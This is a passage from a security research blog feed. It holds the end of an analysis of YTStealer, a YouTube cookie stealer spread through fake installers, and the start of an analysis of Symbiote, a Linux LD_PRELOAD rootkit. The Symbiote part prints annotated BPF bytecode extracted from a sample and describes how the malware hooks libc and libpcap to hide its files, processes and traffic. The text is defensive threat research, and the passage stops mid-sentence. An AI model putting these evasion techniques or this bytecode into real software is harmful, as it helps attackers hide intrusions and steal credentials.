web automation and scraping.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/06/ytstealer-malware-youtube-cookies/images/fig2.png" title="Figure 2: Screenshot of Rods documentation describing the framework." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 2: Screenshot of Rods documentation describing the framework.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Using the web browser, YTStealer navigates to YouTube&amp;rsquo;s Studio page which
allows content creators to manage their content. From YouTube studio, the
malware grabs information about the user&amp;rsquo;s channels. The data it grabs includes
the channel name, how many subscribers it has, how old it is, if it is
monetized, an official artist channel, and if the name has been verified. All
the data is encrypted with a key that is unique for each sample and sends it
together with a sample identifier to the command and control (C2) server
located at the domain name &lt;code&gt;youbot[.]solutions&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;YTStealer doesn&amp;rsquo;t discriminate about what credentials it steals, whether it&amp;rsquo;s
someone uploading Minecraft videos to share with a few friends or a channel
like Mr. Beast with millions of subscribers. On the Dark Web, the &amp;ldquo;quality&amp;rdquo; of
stolen account credentials influences the asking price, so access to more
influential YouTube channels would command higher prices.&lt;/p&gt;
&lt;h2&gt;What is &amp;ldquo;YouBot Solutions&amp;rdquo;?&lt;span class="hx:absolute hx:-mt-20" id="what-is-youbot-solutions"&gt;&lt;/span&gt;
&lt;a href="#what-is-youbot-solutions" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;While investigating all the YTStealer samples that we have come across, we
noticed that all shared the same build path. The path, shown below, looks like
a path from an internal build service. The path also includes the domain name
to which the stealer exfiltrates the stolen data.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;/home/admin/web/youbot.solutions/public_html/Builder/Sources&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;This domain name was registered back in December 2021 and hosts a web server
behind Cloudflare that returns an empty response. By using the domain name we
identified an American corporation with the name of &amp;ldquo;YOUBOT SOLUTIONS LLC&amp;rdquo;. The
corporation was registered in New Mexico on March 8, 2022 (unfortunately, the
State of New Mexico&amp;rsquo;s corporation registry is not accessible outside of the US
but the data can be obtained from
&lt;a href="https://www.bizapedia.com/nm/youbot-solutions-llc.html"target="_blank" rel="noopener"&gt;third party providers&lt;/a&gt;).
Figure 2 shows a screenshot of a Google Business entry for a company with the
same name and address as in the registry database. The company lists itself as
a software company that &amp;ldquo;provides [sic] unique solutions for getting and
monetizing targeted traffic&amp;rdquo;. The website provided in the listing points to
&lt;code&gt;youbot[.]solutions&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/06/ytstealer-malware-youtube-cookies/images/fig3.png" title="Figure 3: Google Business listing for YOUBOT SOLUTIONS LLC." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 3: Google Business listing for YOUBOT SOLUTIONS LLC.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The business listing has a logo of an eye in a red circle. A Google image
search using the icon returned some results with the same image. All the
results were under the domain &lt;code&gt;aparat[.]com&lt;/code&gt;. Aparat is an Iranian
video-sharing site that was founded in 2011. The image matched was used as a
profile picture for a user on the site. Figure 4 shows the profile page of the
user. The profile page provided a link to a Twitter account. Figure 5 shows a
screenshot of the Twitter account.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/06/ytstealer-malware-youtube-cookies/images/fig4.png" title="Figure 4: Screenshot of Aparat user accounts profile page that uses YOUBOT SOLUTIONS LLCs logo as their profile image." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 4: Screenshot of Aparat user accounts profile page that uses YOUBOT SOLUTIONS LLCs logo as their profile image.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/06/ytstealer-malware-youtube-cookies/images/fig5.png" title="Figure 5: Twitter profile linked to in the Aparat user profile." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 5: Twitter profile linked to in the Aparat user profile.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;How Are Victims Targeted?&lt;span class="hx:absolute hx:-mt-20" id="how-are-victims-targeted"&gt;&lt;/span&gt;
&lt;a href="#how-are-victims-targeted" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Given the optics of the infrastructure and that each sample has a unique
identifier, it appears that YTStealer is sold as a service to other threat
actors. With this in mind, we decided to look into if we could get a better
understanding of who is targeted by this stealer. As it is designed to steal
YouTube credentials, it&amp;rsquo;s already clear that YouTube content creators are being
targeted. Can we narrow the scope further?&lt;/p&gt;
&lt;p&gt;We looked at files that either dropped or downloaded the YTStealer samples that
we have collected. The first observation is that the majority of these files
don&amp;rsquo;t just drop YTStealer. The droppers also came loaded with other stealers,
including RedLine and Vidar stealers. Of the different stealers used together
with YTStealer, RedLine stealer was the highest count. Figure 6 shows the
analysis of one of the files that drop both YTStealer and RedLine. One of the
memory modules found has a lot of shared code with other RedLine stealer
samples in our dataset.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/06/ytstealer-malware-youtube-cookies/images/fig6.png" title="Figure 6: Intezer Analyze result for one of the malware dropping YTStealer together with RedLine stealer. (https://analyze.intezer.com/files/132f868aabbd82b36b283f0b6768133b6297de0acd5f47e6cb9a76dc07fd276a)" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 6: Intezer Analyze result for one of the malware dropping YTStealer together with RedLine stealer. (https://analyze.intezer.com/files/132f868aabbd82b36b283f0b6768133b6297de0acd5f47e6cb9a76dc07fd276a)&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;A lot of these files are disguised as installers for tools or legitimate
software. With it targeting content creators, we would expect some of the names
to overlap with tools or software used by the intended targets. Grouping the
names, we do see some overlap.&lt;/p&gt;
&lt;p&gt;One of the groups is &amp;ldquo;Digital, Image, and Video software&amp;rdquo;. We found fake
installers for OBS Studio, an open-source streaming software. Additionally, we
identified a few video editing software installers which included Adobe
Premiere Pro, Filmora, and HitFilm Express. In the audio category, we
identified fake installers for digital audio workstation (DAW) applications and
plugins. This included the DAWs Ableton Live 11 Suite and FL Studio. The
plugins included the infamous Antares Auto-Tune Pro, but also Valhalla DSP,
FabFilter Total, and Xfer Serum.&lt;/p&gt;
&lt;p&gt;The second group is what we call &amp;ldquo;Game mods and cheats&amp;rdquo;. The games match
popular games used by streamers and content creators. We identified fake
installers for the FiveM Grand Theft Auto V mod, different &amp;ldquo;hacks&amp;rdquo; for Roblox,
and cheats for Counter-Strike Go, and Call of Duty. A variant of the Valorant
hack reported on by &lt;a href="https://asec.ahnlab.com/en/32499/"target="_blank" rel="noopener"&gt;AhnLab&lt;/a&gt; earlier was
also discovered. Valorant &amp;ldquo;gamers&amp;rdquo; were also targeted by a
&lt;a href="https://www.youtube.com/watch?v=w5dOjWDVG7g"target="_blank" rel="noopener"&gt;&amp;ldquo;Skin Changer&amp;rdquo;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Another group of tools that can be classified as adjacent to games is driver
tools. Gamers usually would like to squeeze the very last drop of performance
out of their gaming rigs. One way of doing this is to &amp;ldquo;ensure you are using
updated drivers and that they are tuned correctly&amp;rdquo;. In this group, we found
fake installers for tools such as &amp;ldquo;Driver Booster&amp;rdquo; and &amp;ldquo;Driver Easy&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;The last group is for other software and &amp;ldquo;cracks&amp;rdquo;. Here we identified anything
from fake installers for security products, such as Norton Security and
Malwarebytes to &amp;ldquo;token generators&amp;rdquo; and &amp;ldquo;cracks&amp;rdquo; for services such as Discord
Nitro, Stepn, and Spotify Premium.&lt;/p&gt;
&lt;p&gt;The overwhelming part of these fake installers are for pirated versions of the
software, but we also see some fake installers for game mods. This finding
should further stress the importance of only obtaining software from trusted
sources. Only obtain software directly from the vendor or &amp;ldquo;modding&amp;rdquo; group.&lt;/p&gt;
&lt;h2&gt;Lessons Learned&lt;span class="hx:absolute hx:-mt-20" id="lessons-learned"&gt;&lt;/span&gt;
&lt;a href="#lessons-learned" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Someone always has a way of monetizing data. When it comes to stolen YouTube
authentication data, we haven&amp;rsquo;t analyzed how it&amp;rsquo;s being monetized in the next
step of the chain. One potential option could be to defraud the subscribers of
channels. When it comes to how this malware is infecting the victims, we can
see a trend. Most of the fake installers used were for cracked versions of
legitimate software. We also saw fake installers for mods and cheats for games.
When it comes to how to protect yourself, the classic security practice should
be applied. Only use software from trusted sources.&lt;/p&gt;
&lt;h2&gt;Indicators of Compromise&lt;span class="hx:absolute hx:-mt-20" id="indicators-of-compromise"&gt;&lt;/span&gt;
&lt;a href="#indicators-of-compromise" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;&lt;a href="https://github.com/intezer/community-intelligence/blob/master/YTStealer_hashes.txt"target="_blank" rel="noopener"&gt;IoCs can be found on GitHub here.&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Symbiote: Analysis of a New, Nearly-Impossible-to-Detect Linux Threat</title><link>https://research.intezer.com/blog/2022/06/new-linux-threat-symbiote/</link><pubDate>Wed, 22 Jun 2022 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2022/06/new-linux-threat-symbiote/</guid><description>
&lt;p&gt;&lt;em&gt;This research is a joint effort between Joakim Kennedy, Security Researcher at
Intezer, and the BlackBerry Threat Research &amp;amp; Intelligence team. It can be
found in the BlackBerry blog here as well.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;In biology, a symbiote is an organism that lives in symbiosis with another
organism. The symbiosis can be mutually beneficial to both organisms, but
sometimes it can be parasitic when one benefits and the other is harmed. A few
months back, we discovered a new, undetected Linux® malware that acts in this
parasitic nature. We have aptly named this malware Symbiote.&lt;/p&gt;
&lt;p&gt;What makes Symbiote different from other Linux malware that we usually come
across, is that it needs to infect other running processes to inflict damage on
infected machines. Instead of being a standalone executable file that is run to
infect a machine, it is a shared object (SO) library that is loaded into all
running processes using
&lt;a href="https://attack.mitre.org/techniques/T1574/006/"target="_blank" rel="noopener"&gt;LD_PRELOAD (T1574.006)&lt;/a&gt;, and
parasitically infects the machine. Once it has infected all the running
processes, it provides the threat actor with rootkit functionality, the ability
to harvest credentials, and remote access capability.&lt;/p&gt;
&lt;h2&gt;The Birth of a Symbiote&lt;span class="hx:absolute hx:-mt-20" id="the-birth-of-a-symbiote"&gt;&lt;/span&gt;
&lt;a href="#the-birth-of-a-symbiote" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Our earliest detection of Symbiote is from November 2021, and it appears to
have been written to target the financial sector in Latin America. Once the
malware has infected a machine, it hides itself and any other malware used by
the threat actor, making infections very hard to detect. Performing live
forensics on an infected machine may not turn anything up since all the file,
processes, and network artifacts are hidden by the malware. In addition to the
rootkit capability, the malware provides a backdoor for the threat actor to log
in as any user on the machine with a hardcoded password and to execute commands
with the highest privileges.&lt;/p&gt;
&lt;p&gt;Since it is extremely evasive, a Symbiote infection is likely to &amp;ldquo;fly under the
radar.&amp;rdquo; In our research, we haven&amp;rsquo;t found enough evidence to determine whether
Symbiote is being used in highly targeted or broad attacks.&lt;/p&gt;
&lt;p&gt;One interesting technical aspect of Symbiote is its Berkeley Packet Filter
(BPF) hooking functionality. Symbiote is not the first Linux malware to use
BPF. For example,
&lt;a href="https://reverse.put.as/2021/12/17/knock-knock-whos-there/"target="_blank" rel="noopener"&gt;advanced backdoors attributed&lt;/a&gt;
to the
&lt;a href="https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group.en.pdf"target="_blank" rel="noopener"&gt;Equation Group&lt;/a&gt;
have been using BPF for covert communication. However, Symbiote utilizes BPF to
hide malicious network traffic on an infected machine. When an administrator
starts any packet capture tool on the infected machine, BPF bytecode is
injected into the kernel that defines which packets should be captured. In this
process, Symbiote adds its bytecode first so it can filter out network traffic
that it doesn&amp;rsquo;t want the packet-capturing software to see.&lt;/p&gt;
&lt;h2&gt;Evasion Techniques&lt;span class="hx:absolute hx:-mt-20" id="evasion-techniques"&gt;&lt;/span&gt;
&lt;a href="#evasion-techniques" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Symbiote is very stealthy. The malware is designed to be loaded by the linker
via the &lt;code&gt;LD_PRELOAD&lt;/code&gt; directive. This allows it to be loaded before any other
shared objects. Since it is loaded first, it can &amp;ldquo;hijack the imports&amp;rdquo; from the
other library files loaded for the application. Symbiote uses this to hide its
presence on the machine by hooking &lt;code&gt;libc&lt;/code&gt; and &lt;code&gt;libpcap&lt;/code&gt; functions. The image
below shows a summary of the malware&amp;rsquo;s evasions.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/06/new-linux-threat-symbiote/images/fig1.png" title="Figure 1: Symbiote evasion techniques." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 1: Symbiote evasion techniques.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Host Activity&lt;span class="hx:absolute hx:-mt-20" id="host-activity"&gt;&lt;/span&gt;
&lt;a href="#host-activity" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The Symbiote malware, in addition to hiding its own presence on the machine,
also hides other files related to malware likely deployed with it. Within the
binary, there is a file list that is RC4 encrypted. When hooked functions are
called, the malware first dynamically loads libc and calls the original
function. This logic is used in all hooked functions. An example is shown in
Figure 2 below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/06/new-linux-threat-symbiote/images/fig2.png" title="Figure 2: Logic for resolving readdir from libc." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 2: Logic for resolving readdir from libc.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;If the calling application is trying to access a file or folder under &lt;code&gt;/proc&lt;/code&gt;,
the malware scrubs the output from process names that are on its list. The
process names in the list below were extracted from the samples we have
discovered.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;certbotx64&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;certbotx86&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;javautils&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;javaserverx64&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;javaclientex64&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;javanodex86&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If the calling application is not trying to access something under &lt;code&gt;/proc&lt;/code&gt;, the
malware instead scrubs the result from a file list. The files extracted from
all the samples we examined are shown in the list below. Some of the file names
match those used by Symbiote, while others match names of files suspected to be
tools used by the threat actor on the infected machine. The list includes the
following files.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;apache2start&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;apache2stop&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;profiles.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;404erro.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;javaserverx64&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;javaclientex64&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;javanodex86&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;liblinux.so&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;java.h&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;open.h&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;mpt86.h&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sqlsearch.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;indexq.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;mt64.so&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;certbot.h&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;cert.h&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;certbotx64&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;certbotx86&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;javautils&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;search.so&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;One consequence of Symbiote being loaded into processes via &lt;code&gt;LD_PRELOAD&lt;/code&gt; is
that tools like ldd, a utility that prints the shared libraries required by
each program, will list the malware as a loaded object. To counter this, the
malware hooks execve and looks for calls to this function with the environment
variable &lt;code&gt;LD_TRACE_LOADED_OBJECTS&lt;/code&gt; set to 1. To understand why, it&amp;rsquo;s worth
looking at the manual page for &lt;code&gt;ldd&lt;/code&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In the usual case, ldd invokes the standard dynamic linker (see ld.so(8))
with the LD_TRACE_LOADED_OBJECTS environment variable set to 1. This causes
the dynamic linker to inspect the program&amp;rsquo;s dynamic dependencies, and find
(according to the rules described in ld.so(8)) and load the objects that
satisfy those dependencies. For each dependency, ldd displays the location of
the matching object and the (hexadecimal) address at which it is loaded. (The
linux-vdso and ld-linux shared dependencies are special; see vdso(7) and
ld.so(8).)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;When the malware detects this, it executes the loader as ldd does, but it
scrubs its own entry from the result.&lt;/p&gt;
&lt;h2&gt;Network Activity&lt;span class="hx:absolute hx:-mt-20" id="network-activity"&gt;&lt;/span&gt;
&lt;a href="#network-activity" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Symbiote also has functionality to hide network activity on the infected
machine. It uses three different methods to accomplish this. The first method
involves hooking &lt;code&gt;fopen&lt;/code&gt; and &lt;code&gt;fopen64&lt;/code&gt;. If the calling application tries to
open &lt;code&gt;/proc/net/tcp&lt;/code&gt;, the malware creates a temp file and copies the first line
to that file. After that, it scans each line for the presence of specific
ports. If the malware finds a port it&amp;rsquo;s searching for on a line it&amp;rsquo;s scanning,
it skips to the next line. Otherwise, the line is written to the temp file.
Once the original file has been completely processed, the malware closes the
file and returns the file descriptor of the temp file back to the caller.
Essentially, this gives the calling process a scrubbed result, which excludes
all entries of the network connections that the malware wants to hide.&lt;/p&gt;
&lt;p&gt;The second method Symbiote uses to hide its network activity is by hijacking
any injected packet filtering bytecode. The Linux kernel
&lt;a href="https://www.kernel.org/doc/html/latest/networking/filter.html"target="_blank" rel="noopener"&gt;uses extended Berkeley Packet Filter&lt;/a&gt;
(eBPF) to allow packet filtering based on rules provided from a userland
process. The filtering rule is provided as eBPF bytecode that the kernel
executes on a virtual machine (VM). This minimizes the context switching
between kernel and userland, providing a performance boost since the kernel
performs the filtering directly.&lt;/p&gt;
&lt;p&gt;If an application on the infected machine tries to perform packet filtering
with eBPF, Symbiote hijacks the filtering process. First, it hooks the &lt;code&gt;libc&lt;/code&gt;
function &lt;code&gt;setsockopt&lt;/code&gt;. If the function is called with the option
&lt;code&gt;SO_ATTACH_FILTER&lt;/code&gt;, which is used to perform packet filtering on a socket, it
prepends its own bytecode before the eBPF code provided by the calling
application.&lt;/p&gt;
&lt;p&gt;Code Snippet 1 shows an annotated version of the bytecode injected by one of
the Symbiote samples. The bytecode &amp;ldquo;drops&amp;rdquo; if they match the following
conditions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;IPv6 (TCP or SCTP) and src port (43253 or 43753 or 63424 or 26424)&lt;/li&gt;
&lt;li&gt;IPv6 (TCP or SCTP) and dst port 43253&lt;/li&gt;
&lt;li&gt;IPv4 (TCP or SCTP) and src port (43253 or 43753 or 63424 or 26424)&lt;/li&gt;
&lt;li&gt;IPv4 (TCP or SCTP) and dst port (43253 or 43753 or 63424 or 26424)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;While this bytecode only drops packets based on ports, we have also observed
filtering of traffic based on IPv4 addresses. In all cases, the filtering
operates on both inbound and outbound traffic from the machine, to hide both
directions of the traffic. If the conditions are not met, it just jumps to the
start of the bytecode provided by the calling application.&lt;/p&gt;
&lt;p&gt;The bytecode extracted from one of the samples, as shown in Code Snippet 1,
consists of 32 instructions. This code can&amp;rsquo;t be injected into the kernel on its
own, because it assumes that more bytecode exists after it. There are a few
jumps in this bytecode that skip to the beginning of the bytecode provided by
the calling process. Without the caller&amp;rsquo;s bytecode, the injected bytecode would
jump out-of-bounds, which is not allowed by the kernel. Bytecode like this
either has to be handwritten or by patching compiler generated-bytecode. Either
option suggests that this malware was written by a skilled developer.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;; Load Ether frame type from the packet.
0x00: 0x28 0x00 0x00 0x000c ldabsh 0xc
; Jump if it’s not IPv6 (0x86DD)
0x01: 0x15 0x00 0x0b 0x86dd jeq r0, 0x86dd, &amp;#43;0, &amp;#43;0x0b (jump to 0xd)
; Load IPv6 next header into register.
0x02: 0x30 0x00 0x00 0x0014 ldabsb 0x14
; Short jump if SCTP
0x03: 0x15 0x02 0x00 0x0084 jeq r0, 0x84, &amp;#43;0x2 (jump to 0x6) ; SCTP
; Short jump if TCP
0x04: 0x15 0x01 0x00 0x0006 jeq r0, 0x6, &amp;#43;0x1 (jump to 0x6) ; TCP
; Jump to original byte code if UDP
0x05: 0x15 0x00 0x1a 0x0011 jeq r0, 0x11, &amp;#43;0x1a (jump to 0x20) ; UDP
; Load TCP src port into register.
0x06: 0x28 0x00 0x00 0x0036 ldabsh 0x36
; Jump to drop the packet if port 43253.
0x07: 0x15 0x17 0x00 0xa8f5 jeq r0, 0xa8f5, &amp;#43;0x17 (jump to 0x1f) ; 43253
; Jump to drop the packet if port 43753.
0x08: 0x15 0x16 0x00 0xaae9 jeq r0, 0xaae9, &amp;#43;0x16 (jump to 0x1f) ; 43753
; Jump to drop the packet if port 63424.
0x09: 0x15 0x15 0x00 0xf7c0 jeq r0, 0xf7c0, &amp;#43;0x15 (jump to 0x1f) ; 63424
; Jump to drop the packet if port 26424.
0x0a: 0x15 0x14 0x00 0x6738 jeq r0, 0x6738, &amp;#43;0x14 (jump to 0x1f) ; 26424
; Load TCP dst port into register.
0x0b: 0x28 0x00 0x00 0x0038 ldabsh 0x38
; Jump to drop packet if port 43253 else jump to 0x1c.
0x0c: 0x15 0x12 0x0f 0xa8f5 jeq r0, 0xa8f5, &amp;#43;0xf12 (jump to 0x1f) (jump to 0x1c) ; 43253
; Ether frame type check for IPv4 (0x0800)
0x0d: 0x15 0x00 0x12 0x0800 jeq r0, 0x800, &amp;#43;0x1200 (jump to 0x20)
; Load IPv4 next header field into register.
0x0e: 0x30 0x00 0x00 0x0017 ldabsb 0x17
; Short jump if SCTP.
0x0f: 0x15 0x02 0x00 0x0084 jeq r0, 0x84, &amp;#43;0x2 (jump to 0x12) ; SCTP
; Short jump if TCP.
0x10: 0x15 0x01 0x00 0x0006 jeq r0, 0x6, &amp;#43;0x1 (jump to 0x12) ; TCP
; Jump to original byte code if UDP.
0x11: 0x15 0x00 0x0e 0x0011 jeq r0, 0x11, &amp;#43;0xe00 (jump to 0x20) ; UDP
; Load IPv4 flag into register.
0x12: 0x28 0x00 0x00 0x0014 ldabsh 0x14
; Jump to original byte code if flags are set.
0x13: 0x45 0x0c 0x00 0x1fff jset r0, 0x1fff, &amp;#43;0xc (jump to 0x20)
; Load Internet Header Length into x.
0x14: 0xb1 0x00 0x00 0x000e ldxmsh 0x0e
; Load TCP src port into register.
0x15: 0x48 0x00 0x00 0x000e ldindh r0, 0xe
; Jump to drop the packet if port 43253.
0x16: 0x15 0x08 0x00 0xa8f5 jeq r0, 0xa8f5, &amp;#43;0x8 (jump to 0x1f) ; 43253
; Jump to drop the packet if port 43753.
0x17: 0x15 0x07 0x00 0xaae9 jeq r0, 0xaae9, &amp;#43;0x7 (jump to 0x1f) ; 43753
; Jump to drop the packet if port 63424.
0x18: 0x15 0x06 0x00 0xf7c0 jeq r0, 0xf7c0, &amp;#43;0x6 (jump to 0x1f) ; 63424
; Jump to drop the packet if port 26424.
0x19: 0x15 0x05 0x00 0x6738 jeq r0, 0x6738, &amp;#43;0x5 (jump to 0x1f) ; 26424
; Load TCP dst port into register.
0x1a: 0x48 0x00 0x00 0x0010 ldindh r0, 0x10
; Jump to drop the packet if port 43253.
0x1b: 0x15 0x03 0x00 0xa8f5 jeq r0, 0xa8f5, &amp;#43;0x3 (jump to 0x1f) ; 43253
; Jump to drop the packet if port 43753.
0x1c: 0x15 0x02 0x00 0xaae9 jeq r0, 0xaae9, &amp;#43;0x2 (jump to 0x1f) ; 43753
; Jump to drop the packet if port 63424.
0x1d: 0x15 0x01 0x00 0xf7c0 jeq r0, 0xf7c0, &amp;#43;0x1 (jump to 0x1f) ; 63424
; Jump to drop packet if true otherwise jump to original byte code.
0x1e: 0x15 0x00 0x01 0x6738 jeq r0, 0x6738, &amp;#43;0x100 (jump to 0x20); 26424
; Drop packet by returning 0.
0x1f: 0x06 0x00 0x00 0x0000 ret 0
0x20: // Original byte code.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Code Snippet 1: Annotated bytecode extracted from one of the Symbiote samples.&lt;/p&gt;
&lt;p&gt;The third method Symbiote uses to hide its network traffic is to hook &lt;code&gt;libpcap&lt;/code&gt;
functions. This method is used by the malware to filter out UDP traffic to
domain names it has in a list. It hooks the functions &lt;code&gt;pcap_loop&lt;/code&gt; and
&lt;code&gt;pcap_stats&lt;/code&gt; to accomplish this task. For each packet that is received,
Symbiote checks the UDP payload for substrings of the domains it wants to
filter out. If it finds a match, the malware ignores the packet and increments
a counter. The &lt;code&gt;pcap_stats&lt;/code&gt; uses this counter to &amp;ldquo;correct&amp;rdquo; the number of
packets processed by subtracting the counter value from the true number of
packets processed. If a packet payload does not contain any of the strings it
has in its list, the original callback function is called. This method is used
to filter out UDP packets, while the bytecode method is used to filter out TCP
packets. By using all three of these methods, the malware ensures that all
traffic is hidden.&lt;/p&gt;
&lt;h2&gt;Symbiote Objectives&lt;span class="hx:absolute hx:-mt-20" id="symbiote-objectives"&gt;&lt;/span&gt;
&lt;a href="#symbiote-objectives" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The malware&amp;rsquo;s objective, in addition to hiding malicious activity on the
machine, is to harvest credentials and to provide remote access for the threat
actor. The credential harvesting is performed by hooking the &lt;code&gt;libc&lt;/code&gt; &lt;code&gt;read&lt;/code&gt;
function. If an &lt;code&gt;ssh&lt;/code&gt; or &lt;code&gt;scp&lt;/code&gt; process is calling the function, it captures the
